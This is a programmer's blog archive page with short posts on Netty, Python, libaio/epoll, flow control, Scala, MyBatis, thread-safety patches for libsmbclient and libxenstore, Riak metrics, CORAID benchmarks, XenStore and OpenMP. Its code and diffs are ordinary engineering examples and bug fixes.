Monday, December 30, 2013

Performance analysis of our own full blown HTTP server with Netty 4

In previous post Let's do our own full blown HTTP server with Netty 4 you and I were excited by creation of our own web server. So far so good. But how good?

Let's do our own full blown HTTP server with Netty 4

Sometimes servlets just doesn't fit you, sometimes you need to support some protocols except HTTP, sometimes you need something really fast. Allow me to show you the Netty that can suit for these needs.
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. (http://netty.io/)
Netty has everything one needs for HTTP, thus web server on Netty is like a low hanging fruit.
First of all you need to understand what pipeline is, see Interface ChannelPipeline. Pipeline is like processing line where various ChannelHandlers convert input bytes into output. Pipeline corresponds one to one to connection, thus ChannelHandlers in our case will convert HTTP Request into HTTP Response, handlers will be responsible for such auxiliary things like parsing incoming packets and assembling outcoming and also call business logic to handle requests and produce responses.
Full source is available.

Sunday, December 29, 2013

Python, scalable file uploading

Almost every solution suffers from dedicating a thread for particular client (like django) or despite having event loop on board sucking the whole file into the memory (like tornado). That makes impossible to handle either big amount of clients or big files. We also do not want to dedicate a file upload completely to some external entity while we want to make some auth checks before upload will be permitted (otherwise server can be flooded with unauthorized ingest traffic).
I've borrowed the idea below from Anatoly Mikhailov, see his post Nginx direct file upload without passing them through backend. Lets do this quickly.

Thursday, December 26, 2013

Maintainable python code

The benefit of dynamically typed languages is the ease of writing the code but the cost of this is the problem with its understanding.
Such heavily typed languages as Haskell and Scala make use of comprehensive static type system and compiler that does all dirty job. At any given point of code one knows for sure that this particular variable is of this type and this function has such return type, etc. So basically one can understand what is going on. In python with its duck typing one can pass to function any object that adheres to some contract, this function can pass it further and further, add/remove some methods on the fly, etc., etc. So looking at some piece of code where you see variables and function applications one can barely understand it and lose track on what is going on. A static analyzer can help to some degree, see for instance PySonar, a Deep Static Analyzer for Python:
Treatment of Python’s dynamism. Static analysis for Python is hard because it has many dynamic features. They help make programs concise and flexible, but they also make automated reasoning about Python programs hard. Fortunately, some of these features can be reasonably handled. For example, function or class redefinition can be handled by inferring the effective scope of the old and new definitions. For code that are really undecidable, PySonar uses a universal honest answer: “I don’t know.” Well, not quite so. It attempts to report all known possibilities. For example, if a function is “conditionally defined” (e.g., defined differently in two branches of an if-statement) and the condition is undecidable, then PySonar gives it a union type which contains all possible types it can possibly have. By doing that, PySonar reduces false negative rates.
Sidenote, Scala has duck typing via structural types but their usage in general is not recommended because implementation uses reflection that is slow. But indeed Scala structural typing is type safe in contrast to python, see Structural typing vs. Duck typing.
There is an example of dynamically typed language that doesn't suffer from code readability problem - Erlang. One always knows what comes in and what comes out (and as a result what is in each line of code). It doesn't have some comprehensive type system except records aka structs in C. But it has Function Specifications and dialyzer. Unlike python when you call the function in Erlang you pass not some object that has incapsulated state and exposed behavior but just plain data, the input data format is defined in function spec along with return data format. One doesn't need to pass behavior because it is incapsulated in some other lightweight process pid of which you may pass within the data. Because of such elegant/specific implementation of incapsulation and polymorphism Erlang solves problem with readability.

So, while pysonar is promising can one still do something easier and better? Unit tests? Good to have but covering each function is too much. Docstrings? Too informal. After a while I hit the article Making Wrong Code Look Wrong. I ended up with simple idea: name each variable/function in a way everybody understands what type it has/returns (the same for function args).
Simple example. Having following information aside
user variable has type model.User
userid is a user id, has type int
It is easy to get idea what line below does indepedently on where in code you see it
user = user_by_userid(userid)
If you present this information on variables/functions in some formal way, IDEs/static analyzers can also put warnings on variables that do not have such spec and on expressions/statements that just look wrong (see again article by Joel Spolsky), navigate to type definitions, show variable/function descriptions upon hovering, etc.

AIO with epoll event loop

In order to use libaio with epoll event loop use eventfd(2). With eventfd you create a descriptor and add it to epoll to observe and to libaio to notify when it has some events. Excerpt from source below
if ((afd = eventfd()) == -1)
    goto err_end;
...

io_set_eventfd(&iocb, afd);
...

ev.events = EPOLLIN | EPOLLET;
ev.data.ptr = p;
if (epoll_ctl(epollfd, EPOLL_CTL_ADD, afd, &ev) == -1) {
    log_syserr("epoll_ctl");
    goto err_end;
}
Full source is available.

Pipelining and flow control

If you are about to create your own application level protocol on top of TCP to load your backend to its limit you should know about how to design such a protocol. Two things that go into mind immediately are pipelining and flow control.
Pipelining is what you have from the box if you are using stream based transport layer. For higher level protocols one needs not to throw it away, for instance, HTTP 1.1 supports pipelining. In brief this is to eliminate latency and jitter between client and server.
To see what flow control is take a look at Akka IO Write models. This gives an ability to the server to say don't push at me, slow down. Indeed TCP too implements ack based flow control.
How to use it? For instance, imagine you have a queue of tasks on server side that is filled by clients and processed by backend. In case clients send tasks too quick the length of the queue grows. One needs to introduce so named high watermark and low watermark. If queue length is greater than high watermark stop reading from sockets and queue length will decrease. When queue length becomes less than low watermark start reading tasks from sockets again.
Note, to make it possible for clients to adapt to speed you process tasks (actually to adapt window size) one shouldn't make a big gap between high and low watermarks. From the other side small gap means you'll be too often add/remove sockets from the event loop.
Some excerpt from real project that uses libev below
//------------------------------------------------------------------

static request_s *request_new(connection_s *con) {
    request_s *new_request;

    new_request = alloc_data(request_mem_mng);
    if (!new_request) {
        log_err("cannot allocate memory");
        goto err;
    }
    memset(new_request, 0, sizeof(request_s));
    
    // Add to connection's list of requests
    list_add_tail(&new_request->request_list, &con->request_list);
    
    new_request->con = con;
    
    {
        // Flow control
        num_reqs++;
        
        if (num_reqs == REQUEST_HIGH_WATERMARK) {
            list_s *elt;
            connection_s *con;
            for (elt = connection_list.next; elt != &connection_list; elt = elt->next) {
                con = list_elt(elt, connection_s, connection_list);
                ev_io_stop(e_loop, &con->read_watcher);
            }
        }
    
    }
    
    return new_request;
err:
    return NULL;
}

//------------------------------------------------------------------

static void request_del(request_s *req) {
    list_del(&req->request_list);
    list_del(&req->request_wait);

    if (req->data)
        free_data(data_mem_mng, req->data);

    free_data(request_mem_mng, req);

    {
        // Flow control
        num_reqs--;
        
        if (num_reqs == REQUEST_LOW_WATERMARK) {
            list_s *elt;
            connection_s *con;
            for (elt = connection_list.next; elt != &connection_list; elt = elt->next) {
                con = list_elt(elt, connection_s, connection_list);
                ev_io_start(e_loop, &con->read_watcher);
            }
        }
    
    }
}
Full source is available.

Why Scala

Pros
  1. Scala runs on jvm - the most mature and trusted vm, that is fast, really fast, on linux one can make use of mmapped files, epoll, AsynchronousChannel and other stuff. Take a look at Resin web server, it is fast as hell (by hell I mean nginx, resin has bigger memory footprint but can process requests as fast, but a part of resin is written in C though).
  2. Scala can reuse any java library (and they are many) and run in various java containers such as any Servlet/Web Profile container like Resin/Tomcat/Glassfish or even OSGi one.
  3. Scala absorbed almost every good thing from programming languages existed in past 40+ years (Lisp - 1958, ML - 1973, Haskell - 1990, Java - 1995). For those who loved Typeclasses in Haskell Scala has implicits that are effectively the same beast. And unlike academic languages such as Lisp and Haskell Scala has good practical focus.
  4. Scala has mature and proven Akka framework that is a copy of Erlang OTP - best thing for highly available and scalable applications. See Case Studies. You will love supervision trees, transparent from application perspective distribution of actors among nodes, declarative executors configuration, IO model, etc. Akka IPC is based on Netty that is one of the best Java IO frameworks that even implements its own buffer pool to not suffer from GC. Akka has also its own cluster implementation with the Gossip protocol on board.
  5. Scala has its own web frameworks like Play and Spray, both on top of Akka.
Cons
  1. Scala is a bit complex. Ideally one needs to have experience in Java (you'll be using jvm and java libs anyways), Haskell (to understand functional stuff), Erlang OTP (to properly use Actors and reactive programming).
But here one more Pros
  1. You can write application in java and start writing some parts in Scala that make it possible to transfer smoothly.

Wednesday, December 25, 2013

Good Transfer Object Hierarhy

One approach worked well for me. Allow me to show by example.
class UserTO {
 private Long id;
 ...

 public Long getId() {
  return id;
 }

 public void setId(Long id) {
  this.id = id;
 }
 ...
}

class UserHistoryTO {
 private Long id;
 ...

 public Long getId() {
  return id;
 }

 public void setId(Long id) {
  this.id = id;
 }
 ...
}

class UserDetailsTO extends UserTO {
 private List<UserHistoryTO> userHistory;
 ...

 public List<UserHistoryTO> getUserHistory() {
  return userHistory;
 }

 public void setUserHistory(List<UserHistoryTO> userHistory) {
  this.userHistory = userHistory;
 }
 ...
}
Do you see the point? Ok, whatever.

I'll go with MyBatis

You've worked hard and developed a bunch of persistence capable entities, data objects to hold projections, a good amount of JPQL/HQL NamedQueries, a few native SQL queries, optimistic locking is still perfect, you've put OpenEntityManagerInViewFilter because of some lazy things do not adhere to transaction demarcation and boundaries, and it works, it works just fine. Then you push it to production wait a month or so open The Slow Query Log, !#@! you think.

I'd advise against JPA/Hibernate especially when you do something highly scalable and highly available (see Sean Hull's 20 Biggest Bottlenecks That Reduce And Slow Down Scalability, Rule Number 9), especially when CQRS and Event Sourcing are a big deal. Ok, one may believe that doing programming with relational database without knowing how to write SQL and what execute plan will be used to run it is a good idea in case you protect yourself with Hibernate. But despite Hibernate abstracts RDB it doesn't remove complexity, take a look at Hibernate ORM documentation. And after all abstractions are leaky and you'll end up debugging SQL and writing native queries.

But you probably do not want to program in JDBC anymore. To make it convenient to work with DB and let DB do its stuff I'd use MyBatis that just removes boilerplate code and doesn't introduce some piece of magic. And yes, it is simple, see MyBatis3 Introduction.

To make you feel what it is like a really minimalistic example below. Mapper xml file src/main/resources/test/persistence/TestMapper.xml
<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE mapper PUBLIC "-//mybatis.org//DTD Mapper 3.0//EN" 
"http://mybatis.org/dtd/mybatis-3-mapper.dtd">

<mapper namespace="test.persistence.TestMapper">

 <select id="selectOne" parameterType="long" resultType="test">
  SELECT
  t.id, t.name
  FROM test t
  WHERE t.id = #{id}
 </select>
</mapper>
Mapper interface src/main/java/test/persistence/TestMapper.java
package test.persistence;

import test.model.Test;

public interface TestMapper {
 Test selectOne(Long id);
}
Transfer object src/main/java/test/model/Test.java
package test.model;

import java.io.Serializable;

public class Test implements Serializable {

 private Long id;

 private String name;

 public Test() {
  super();
 }

 public Long getId() {
  return id;
 }

 public void setId(Long id) {
  this.id = id;
 }

 public String getName() {
  return name;
 }

 public void setName(String name) {
  this.name = name;
 }

}
And a piece of code that make use of it
try (SqlSession session = sqlSessionFactory.openSession(TransactionIsolationLevel.REPEATABLE_READ)) {
 TestMapper mapper = session.getMapper(TestMapper.class);
 Test res = mapper.selectOne(1L);
 session.commit();
}
So as you may guess the mapper interface is implemented by MyBatis with the help of provided mapper xml file. See MyBatis3 Getting started.

Tuesday, December 24, 2013

Java, ConcurrentSkipListMap

Why there is no ConcurrentTreeMap in java? Because trees are badly parallelized, but it is easy to implement lock-free skip list with the same cost O(log(n)).

If you have no memory but still want hash table

Ordinary hash table has practical limit on load factor below 75%. If you want more consider Cuckoo hashing, using just three hash functions increases the load to 91%.

libsmbclient3 and multithreading

If you want to use libsmbclient3 in process with many threads you are out of luck.
The first problem is talloc_stack.c in libsmbclient is not thread safe. Easy to fix
diff --git a/lib/util/talloc_stack.c b/lib/util/talloc_stack.c
index 8e559cc..b88962b 100644
--- a/lib/util/talloc_stack.c
+++ b/lib/util/talloc_stack.c
@@ -39,6 +39,11 @@
 
 #include "includes.h"
 
+
+#include <pthread.h>
+static pthread_mutex_t mutex_lock = PTHREAD_MUTEX_INITIALIZER;
+
+
 struct talloc_stackframe {
     int talloc_stacksize;
     int talloc_stack_arraysize;
@@ -82,7 +87,12 @@ static struct talloc_stackframe *talloc_stackframe_create(void)
         smb_panic("talloc_stackframe_init malloc failed");
     }
 
-    SMB_THREAD_ONCE(&ts_initialized, talloc_stackframe_init, NULL);
+    SMB_THREAD_LOCK(&mutex_lock);
+    if (!ts_initialized)
+        talloc_stackframe_init(NULL);
+    ts_initialized = true;
+    SMB_THREAD_UNLOCK(&mutex_lock);
+    //SMB_THREAD_ONCE(&ts_initialized, talloc_stackframe_init, NULL);
 
     if (SMB_THREAD_SET_TLS(global_ts, ts)) {
         smb_panic("talloc_stackframe_init set_tls failed");
@@ -118,6 +128,7 @@ static int talloc_pop(TALLOC_CTX *frame)
 static TALLOC_CTX *talloc_stackframe_internal(size_t poolsize)
 {
     TALLOC_CTX **tmp, *top, *parent;
+    if (global_ts == NULL) talloc_stackframe_init(NULL);
     struct talloc_stackframe *ts =
         (struct talloc_stackframe *)SMB_THREAD_GET_TLS(global_ts);
Second problem. Methods set_global_myname() and set_global_myworkgroup() in source3/lib/util_names.c are not thread safe too.
diff --git a/source3/lib/util_names.c b/source3/lib/util_names.c
index bd6e5c1..1d8a96e 100644
--- a/source3/lib/util_names.c
+++ b/source3/lib/util_names.c
@@ -27,17 +27,24 @@
 static char *smb_myname;
 static char *smb_myworkgroup;
 
+#include <pthread.h>
+static pthread_mutex_t mutex_lock = PTHREAD_MUTEX_INITIALIZER;
+
 /***********************************************************************
  Allocate and set myname. Ensure upper case.
 ***********************************************************************/
 
 bool set_global_myname(const char *myname)
 {
+    SMB_THREAD_LOCK(&mutex_lock);
     SAFE_FREE(smb_myname);
     smb_myname = SMB_STRDUP(myname);
-    if (!smb_myname)
+    if (!smb_myname) {
+        SMB_THREAD_UNLOCK(&mutex_lock);
         return False;
+    }
     strupper_m(smb_myname);
+    SMB_THREAD_UNLOCK(&mutex_lock);
     return True;
 }
 
@@ -52,11 +59,15 @@ const char *global_myname(void)
 
 bool set_global_myworkgroup(const char *myworkgroup)
 {
+    SMB_THREAD_LOCK(&mutex_lock);
     SAFE_FREE(smb_myworkgroup);
     smb_myworkgroup = SMB_STRDUP(myworkgroup);
-    if (!smb_myworkgroup)
+    if (!smb_myworkgroup) {
+        SMB_THREAD_UNLOCK(&mutex_lock);
         return False;
+    }
     strupper_m(smb_myworkgroup);
+    SMB_THREAD_UNLOCK(&mutex_lock);
     return True;
 }
What you still need to know about libsmbclient3 and multithreading? Each context (SMBCCTX) must be used only by one thread at the same time. All resources (open files and directories) are bound to specific context and one cannot use it in another.

libxenstore bug

Opensource is perfect till you hit the critical bug. Then you are doomed. Ok, just joking. There is a community, in other words there are a lot of doomed people like you and bugs like this.
An example. There was (and probably is) a bug in Xen qemu-dm. It can just hang forever due to some circumstances. Some is a key word here. First time I've seen this in Xen Opensource 3.4.2. Taking into account that qemu-dm is responsible for all IO of some VM, this VM hangs too.

The problem was in libxenstore that called pthread_cond_wait():
#define condvar_wait(c,m,hnd)   pthread_cond_wait(c,m)

mutex_lock(&h->watch_mutex);

/* Wait on the condition variable for a watch to fire. */
while (list_empty(&h->watch_list))
        condvar_wait(&h->watch_condvar, &h->watch_mutex, h);
msg = list_top(&h->watch_list, struct xs_stored_msg, list);
list_del(&msg->list);

/* Clear the pipe token if there are no more pending watches. */
if (list_empty(&h->watch_list) && (h->watch_pipe[0] != -1))
        while (read(h->watch_pipe[0], &c, 1) != 1)
                continue;
watch_pipe is used for notifications (for select) about events in watch_list. Separate thread is writing to this pipe during element addition to this list in method read_message():
#define condvar_signal(c)       pthread_cond_signal(c)

mutex_lock(&h->watch_mutex);

/* Kick users out of their select() loop. */
if (list_empty(&h->watch_list) &&
    (h->watch_pipe[1] != -1))
        while (write(h->watch_pipe[1], body, 1) != 1)
                continue;

list_add_tail(&msg->list, &h->watch_list);

condvar_signal(&h->watch_condvar);

mutex_unlock(&h->watch_mutex);
It looks ok but it is not. Sometimes select() reports a read readiness for watch_pipe[0] when watch_list is empty and pthread_cond_wait() hangs indefinitely. This is a big mistake. First of all, kernel can mistakenly give you false positives, second, even if your pipe contains something to read before you actually read from list some another thread can modify this list.
Having said that the patch is obvious
diff --git a/xen-3.4.2/tools/ioemu-qemu-xen/xenstore.c b/xen-3.4.2/tools/ioemu-qemu-xen/xenstore.c
index 11b305d..894e9a5 100644
--- a/xen-3.4.2/tools/ioemu-qemu-xen/xenstore.c
+++ b/xen-3.4.2/tools/ioemu-qemu-xen/xenstore.c
@@ -953,7 +953,7 @@ void xenstore_process_event(void *opaque)
     char **vec, *offset, *bpath = NULL, *buf = NULL, *drv = NULL, *image = NULL;
     unsigned int len, num, hd_index;
 
-    vec = xs_read_watch(xsh, &num);
+    vec = xs_read_watch_noblock(xsh, &num);
     if (!vec)
         return;
 
diff --git a/xen-3.4.2/tools/xenstore/xs.c b/xen-3.4.2/tools/xenstore/xs.c
index 9707d19..9ce5be6 100644
--- a/xen-3.4.2/tools/xenstore/xs.c
+++ b/xen-3.4.2/tools/xenstore/xs.c
@@ -611,11 +611,11 @@ bool xs_watch(struct xs_handle *h, const char *path, const char *token)
                 ARRAY_SIZE(iov), NULL));
 }
 
-/* Find out what node change was on (will block if nothing pending).
+/* Find out what node change was on.
  * Returns array of two pointers: path and token, or NULL.
  * Call free() after use.
  */
-char **xs_read_watch(struct xs_handle *h, unsigned int *num)
+static char **xs_read_watch_(struct xs_handle *h, unsigned int *num, bool block)
 {
     struct xs_stored_msg *msg;
     char **ret, *strings, c = 0;
@@ -623,9 +623,19 @@ char **xs_read_watch(struct xs_handle *h, unsigned int *num)
 
     mutex_lock(&h->watch_mutex);
 
-    /* Wait on the condition variable for a watch to fire. */
-    while (list_empty(&h->watch_list))
-        condvar_wait(&h->watch_condvar, &h->watch_mutex, h);
+    if (block) {
+        /* Wait on the condition variable for a watch to fire. */
+        while (list_empty(&h->watch_list))
+            condvar_wait(&h->watch_condvar, &h->watch_mutex, h);
+    }
+    else if (list_empty(&h->watch_list)) {
+        /* Clear the pipe token if there are no more pending watches. */
+        if (list_empty(&h->watch_list) && (h->watch_pipe[0] != -1))
+            while (read(h->watch_pipe[0], &c, 1) != 1)
+                continue;
+        mutex_unlock(&h->watch_mutex);
+        return NULL;
+    }
     msg = list_top(&h->watch_list, struct xs_stored_msg, list);
     list_del(&msg->list);
 
@@ -662,6 +672,15 @@ char **xs_read_watch(struct xs_handle *h, unsigned int *num)
     return ret;
 }
 
+char **xs_read_watch(struct xs_handle *h, unsigned int *num)
+{
+    return xs_read_watch_(h, num, true);
+}
+
+char **xs_read_watch_noblock(struct xs_handle *h, unsigned int *num)
+{
+    return xs_read_watch_(h, num, false);
+}
 /* Remove a watch on a node.
  * Returns false on failure (no watch on that node).
  */
diff --git a/xen-3.4.2/tools/xenstore/xs.h b/xen-3.4.2/tools/xenstore/xs.h
index bd36a0b..a921a40 100644
--- a/xen-3.4.2/tools/xenstore/xs.h
+++ b/xen-3.4.2/tools/xenstore/xs.h
@@ -109,6 +109,7 @@ int xs_fileno(struct xs_handle *h);
  * elements. Call free() after use.
  */
 char **xs_read_watch(struct xs_handle *h, unsigned int *num);
+char **xs_read_watch_noblock(struct xs_handle *h, unsigned int *num);
 
 /* Remove a watch on a node: implicitly acks any outstanding watch.
  * Returns false on failure (no watch on that node).

Get statistics from Riak

Riak uses folsom_metrics to gather stats. For instance, to obtain GET and PUT operations speed
erl -name tst -remsh dev1@127.0.0.1 -setcookie riak

(dev1@127.0.0.1)1> folsom_metrics:get_histogram_statistics({riak_kv,node_get_fsm_time}).
[{min,4717},
{max,8996},
{arithmetic_mean,7383.6},
{geometric_mean,7212.3111343349},
{harmonic_mean,7027.752380931542},
{median,7322},
{variance,2550850.2666666666},
{standard_deviation,1597.1381488984184},
{skewness,-0.4278090078808716},
{kurtosis,-1.5957932734122735},
{percentile,[{75,8726},{95,8996},{99,8996},{999,8996}]},
{histogram,[{7317,4},{10717,6},{12717,0}]}]

(dev1@127.0.0.1)2> folsom_metrics:get_histogram_statistics({riak_kv,node_put_fsm_time}).
[{min,6377},
{max,15908},
{arithmetic_mean,11016.857142857143},
{geometric_mean,10642.075761157581},
{harmonic_mean,10268.560398236386},
{median,10245},
{variance,8786965.516483517},
{standard_deviation,2964.281618956525},
{skewness,0.1986125638310398},
{kurtosis,-1.3191900349579302},
{percentile,[{75,14016},{95,14995},{99,15908},{999,15908}]},
{histogram,[{11377,9},{15377,4},{19377,1}]}]
Note
  • all values are in microseconds;
  • stats are stored for last minute only;
  • data is stored in memory (in ets tables), minimal impact on performance.
There was a task to gather stats about backend speed (leveldb and bitcask). Unfortunately Riak doesn't have such stats. To add them use patch below
diff --git a/src/riak_kv_stat.erl b/src/riak_kv_stat.erl
index 6cd5240..cf06de8 100644
--- a/src/riak_kv_stat.erl
+++ b/src/riak_kv_stat.erl
@@ -250,6 +250,8 @@ update1({get_fsm, Bucket, Microsecs, undefined, undefined, PerBucket}) ->
     folsom_metrics:notify_existing_metric({?APP, node_gets}, 1, spiral),
     folsom_metrics:notify_existing_metric({?APP, node_get_fsm_time}, Microsecs, histogram),
     do_get_bucket(PerBucket, {Bucket, Microsecs, undefined, undefined});
+update1({get_vnode, Microsecs}) ->
+    folsom_metrics:notify_existing_metric({?APP, vnode_get_time}, Microsecs, histogram);
 update1({get_fsm, Bucket, Microsecs, NumSiblings, ObjSize, PerBucket}) ->
     folsom_metrics:notify_existing_metric({?APP, node_gets}, 1, spiral),
     folsom_metrics:notify_existing_metric({?APP, node_get_fsm_time}, Microsecs, histogram),
@@ -260,6 +262,8 @@ update1({put_fsm_time, Bucket,  Microsecs, PerBucket}) ->
     folsom_metrics:notify_existing_metric({?APP, node_puts}, 1, spiral),
     folsom_metrics:notify_existing_metric({?APP, node_put_fsm_time}, Microsecs, histogram),
     do_put_bucket(PerBucket, {Bucket, Microsecs});
+update1({put_vnode, Microsecs}) ->
+    folsom_metrics:notify_existing_metric({?APP, vnode_put_time}, Microsecs, histogram);
 update1(read_repairs) ->
     folsom_metrics:notify_existing_metric({?APP, read_repairs}, 1, spiral);
 update1(coord_redir) ->
@@ -370,8 +374,10 @@ stats() ->
      {node_get_fsm_siblings, histogram},
      {node_get_fsm_objsize, histogram},
      {node_get_fsm_time, histogram},
+     {vnode_get_time, histogram},
      {node_puts, spiral},
      {node_put_fsm_time, histogram},
+     {vnode_put_time, histogram},
      {read_repairs, spiral},
      {coord_redirs_total, counter},
      {mapper_count, counter},
diff --git a/src/riak_kv_vnode.erl b/src/riak_kv_vnode.erl
index 0c1d761..8482548 100644
--- a/src/riak_kv_vnode.erl
+++ b/src/riak_kv_vnode.erl
@@ -760,8 +760,12 @@ perform_put({true, Obj},
                      reqid=ReqID,
                      index_specs=IndexSpecs}) ->
     Val = term_to_binary(Obj),
+    StartNow = now(),
     case Mod:put(Bucket, Key, IndexSpecs, Val, ModState) of
         {ok, UpdModState} ->
+            EndNow = now(),
+            Microsecs = timer:now_diff(EndNow, StartNow),
+            riak_kv_stat:update({put_vnode, Microsecs}),
             case RB of
                 true ->
                     Reply = {dw, Idx, Obj, ReqID};
@@ -866,7 +870,12 @@ do_get_term(BKey, Mod, ModState) ->
     end.
 
 do_get_binary({Bucket, Key}, Mod, ModState) ->
-    Mod:get(Bucket, Key, ModState).
+    StartNow = now(),
+    Res = Mod:get(Bucket, Key, ModState),
+    EndNow = now(),
+    Microsecs = timer:now_diff(EndNow, StartNow),
+    riak_kv_stat:update({get_vnode, Microsecs}),
+    Res.
 
 %% @private
 %% @doc This is a generic function for operations that involve
And now
(dev1@127.0.0.1)1> folsom_metrics:get_histogram_statistics({riak_kv,vnode_get_time}).
[{min,1516},
{max,5511},
{arithmetic_mean,3751.9},
{geometric_mean,3486.0111678580415},
{harmonic_mean,3190.229915515953},
{median,3892},
{variance,1879300.7666666668},
{standard_deviation,1370.8759122060126},
{skewness,-0.2710851221084366},
{kurtosis,-1.6493136210655186},
{percentile,[{75,4760},{95,5511},{99,5511},{999,5511}]},
{histogram,[{3816,4},{6516,6},{8516,0}]}]

(dev1@127.0.0.1)2> folsom_metrics:get_histogram_statistics({riak_kv,vnode_put_time}).
[{min,507},
{max,1776},
{arithmetic_mean,952.6428571428571},
{geometric_mean,818.2293396377823},
{harmonic_mean,722.2652885738648},
{median,561},
{variance,317468.09340659337},
{standard_deviation,563.4430702445397},
{skewness,0.5582974538827159},
{kurtosis,-1.7588827239013622},
{percentile,[{75,1615},{95,1759},{99,1776},{999,1776}]},
{histogram,[{1407,9},{2207,5},{3007,0}]}]
Also note that with n_val=3 1 PUT for Riak equals to (1 GET + 1 PUT) * 3 nodes for leveldb/bitcask. And 1 GET for Riak equals to 1 GET * 3 nodes for leveldb/bitcask.

CORAID speed test

Hardware: 2x10Gb link, 36x2TB drives on CORAID SRX 4200.
aoe-stat
e0.X 2000.398GB eth2,eth3 8704 up
(36 drives total)
ethtool eth2
Speed: 10000Mb/s
ethtool eth3
Speed: 10000Mb/s
 
cec -s 0 eth2
disks
0.0 2000.398GB X.0.0 WDC WD2003FYYS-02W0B0 01.01D01 sata 3.0Gb/s
(36 drives total)
list -l
X 2000.399GB online
X.0 2000.399GB jbod normal
X.0.0 normal 2000.399GB 0.X
(36 JBODs total)
CORAID raw device speed (using aio, O_DIRECT to omit the cache, O_SYNC and different RAID types):
  • JBODs, 36 LUNs per 2TB, 4 simultaneous request/LUN, read and write by 4K blocks
50% reads, 50% writes = 220.45 iops/LUN, 2m5.678s/1000000 blocks
reads = 163.39 iops/LUN, 2m49.834s/1000000 blocks
writes = 455.37 iops/LUN, 1m0.602s/1000000 blocks
  • raid6rs, 4 LUNs per 14TB, 100 simultaneous request/LUN, read and write by 4K blocks
50% reads, 50% writes = 274.72 iops/LUN, 1m31.482s/100000 blocks
reads = 1524.39 iops/LUN, 2m43.648s/1000000 blocks
writes = 164.47 iops/LUN, 2m31.699s/100000 blocks
  • raid5, 4 LUNs per 16TB, 100 simultaneous request/LUN, read and write by 4K blocks
50% reads, 50% writes = 827.81 iops/LUN, 2m31.095s/500000 blocks
reads = 1519.94 iops/LUN, 2m44.482s/1000000 blocks
writes = 555.55 iops/LUN, 0m44.665s/100000 blocks

See the test program. You need libaio for it (POSIX aio in librt uses pthreads which is not appropriate because of massive parallelism in our tests).

Xenstore for fun and profit

The XenStore is the configuration database in which Xen stores information on the running domUs. Although Xen uses the XenStore internally for vital matters like setting up virtual devices, you can also write arbitrary data to it from domUs as well as from dom0. Think of it as some sort of interdomain socket.
I've stolen a useful script from The Book of Xen
#!/bin/sh

function dumpkey() {
  local param=${1}
  local key
  local result
  result=$(xenstore-list ${param})
  if [ "${result}" != "" ] ; then
    for key in ${result} ; do dumpkey ${param}/${key} ; done
  else
    echo -n ${param}'='
    xenstore-read ${param}
  fi
}

for key in /vm /local/domain /tool ; do dumpkey ${key} ; done
Lets do this
/vm/00000000-0000-0000-0000-000000000000/on_xend_stop=ignore
/vm/00000000-0000-0000-0000-000000000000/shadow_memory=0
/vm/00000000-0000-0000-0000-000000000000/uuid=00000000-0000-0000-0000-000000000000
/vm/00000000-0000-0000-0000-000000000000/on_reboot=restart
/vm/00000000-0000-0000-0000-000000000000/image/ostype=linux
/vm/00000000-0000-0000-0000-000000000000/image/kernel=
/vm/00000000-0000-0000-0000-000000000000/image/cmdline=
/vm/00000000-0000-0000-0000-000000000000/image/ramdisk=
/vm/00000000-0000-0000-0000-000000000000/on_poweroff=destroy
/vm/00000000-0000-0000-0000-000000000000/bootloader_args=
/vm/00000000-0000-0000-0000-000000000000/on_xend_start=ignore
/vm/00000000-0000-0000-0000-000000000000/on_crash=restart
/vm/00000000-0000-0000-0000-000000000000/xend/restart_count=0
/vm/00000000-0000-0000-0000-000000000000/vcpus=4
/vm/00000000-0000-0000-0000-000000000000/vcpu_avail=15
/vm/00000000-0000-0000-0000-000000000000/bootloader=
/vm/00000000-0000-0000-0000-000000000000/name=Domain-0
/vm/00000000-0000-0000-0000-000000000000/memory=2796
/local/domain/0/vm=/vm/00000000-0000-0000-0000-000000000000
/local/domain/0/device=
/local/domain/0/control/platform-feature-multiprocessor-suspend=1
/local/domain/0/error=
/local/domain/0/memory/target=2863104
/local/domain/0/guest=
/local/domain/0/hvmpv=
/local/domain/0/cpu/1/availability=online
/local/domain/0/cpu/3/availability=online
/local/domain/0/cpu/2/availability=online
/local/domain/0/cpu/0/availability=online
/local/domain/0/name=Domain-0
/local/domain/0/console/limit=1048576
/local/domain/0/console/type=xenconsoled
/local/domain/0/domid=0
/local/domain/0/device-model=
/tool/xenstored=

Xenoprof, Xen profiling

Xenoprof is a system-wide profiler for Xen virtual machine environments, capable of profiling the Xen virtual machine monitor, multiple Linux guest operating systems, and applications running on them. (http://xenoprof.sourceforge.net/)
A little bit outdated but still useful Xenoprof overview & Networking Performance Analysis.

SMP as easy as you cannot imagine

In contrast to MPP where MPI is a standard, in the world of SMP pthreads are de facto standard way to make your program execute in parallel. But there is another standard, OpenMP.
test_parallel.c
#include <stdio.h>
#include <unistd.h>

#ifdef _OPENMP
  #include <omp.h>
#else
  #define omp_get_thread_num() 0
#endif


int main(int argc, char *argv) {
  int n = 10;
  int i;
  
  #pragma omp parallel
  {
    printf("thread %d\n", omp_get_thread_num());

    #pragma omp for
    for (i = 1; i <= n; i++ ) {
      sleep(1);
    }
  }
}
Test
gcc test_parallel.c
time ./a.out 
thread 0

real    0m10.002s
user    0m0.000s
sys     0m0.001s
Enable OpenMP
gcc -fopenmp test_parallel.c
time ./a.out 
thread 3
thread 7
thread 0
thread 4
thread 1
thread 5
thread 6
thread 2

real    0m2.002s
user    0m0.009s
sys     0m0.004s

Smoke and unit tests for C

Take a look at vstr library source code. This is de facto a standard on tests implementation in C without any additional tools like googletest. See below what to do if you do not want to put one more tool to your project but still need tests.
tst_main.c
#include <stdlib.h>

#include "backup_app.h"
#include "tst.h"

int main (int argc, char ** argv) {

    DBHOST = "127.0.0.1";
    DBUSER = "root";
    DBDB = "???";
    DBPORT = 3306;

    return tst();
}


/*---------------------------------------------------
  mocks */

int snmp_log(int priority, const char *format, ...) {
    va_list ap;

    va_start(ap, format);

    if (vfprintf(stderr, format, ap) < 0)
        goto error;

    va_end(ap);
    return 0;


error:
    va_end(ap);
    return 1;
}
One of the tests, tst_cmd_ok.c
#include <stdlib.h>
#include "extern_cmd.h"
#include "tst.h"

int tst() {
    int     ret;
    char   *args[] = {"/bin/ls", "-l", NULL};
    char   *res = mb_cmd_exec(args, NULL);
    ret = (res) ? SUCCESS : FAILED;
    free(res);
    return ret;
}
Makefile
.PHONY: clean

CC=gcc

CFLAGS=-g -Wall -I..
LDFLAGS=-Wl,--unresolved-symbols=ignore-all
